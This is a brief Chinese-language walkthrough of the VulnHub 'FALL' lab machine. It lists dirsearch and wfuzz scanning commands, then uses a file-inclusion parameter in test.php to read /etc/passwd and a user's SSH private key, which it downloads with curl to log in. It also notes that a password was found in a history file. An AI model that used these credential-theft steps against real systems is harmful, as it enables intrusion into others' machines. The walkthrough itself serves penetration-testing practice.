Vulhub靶机--FAll
1.靶机下载地址
https://download.vulnhub.com/digitalworld/FALL.7z
这里可以看到ip和部分端口,我们还是扫描一下查看
2.扫描靶机和kali ip
kali
靶机
3.访问靶机80端口
4.敏感目录扫描
dirsearch -u "http://192.168.195.135"
5.依次打开文件查看
发现/test.php中缺少get参数
6.使用kali自带的字典,爆破查询参数
wfuzz -u "http://192.168.195.135/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
7.查看文件/etc/password
8.查看qiu
的 ssh 密钥:
http://192.168.195.135/test.php?file=/home/qiu/.ssh/id_rsa
9.在kali内将私钥文件页面内容下载下来
curl http://192.168.195.135/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa
10.提升文件权限,私钥连接
11.提权
查看历史文件知道用户密码